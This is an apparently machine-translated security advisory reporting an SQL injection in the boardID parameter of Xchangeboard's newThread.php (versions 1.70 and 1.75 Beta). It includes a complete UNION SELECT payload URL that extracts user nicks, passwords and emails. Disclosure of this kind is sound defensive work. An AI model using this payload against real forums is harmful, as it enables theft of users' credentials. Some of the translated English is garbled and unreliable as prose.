Is affected the system:
Henrik Brinkmann XChangeboard 1.75 Beta
Henrik Brinkmann XChangeboard 1.70

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30059

Xchangeboard is based on PHP and the MySQL notice board solution.

In the Xchangeboard newThread.php document has not confirmed correctly to the boardID parameter input then uses in the SQL inquiry, this permission long-distance aggressor carries out SQL through the submission evil intention's inquiry request to pour into the attack.

<* origin: haZl0oh
 
  Link: http://secunia.com/advisories/30919/
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) possibly has the aggressivity, only supplies the safe research and teaching. The user risk is proud!

http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*

Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:

Henrik Brinkmann
----------------
At present the manufacturer has not provided the patch or the promotion procedure, we suggested that uses this software's user momentarily to pay attention to the manufacturer the main page to gain the newest edition:

http://www.xchangeboard.de/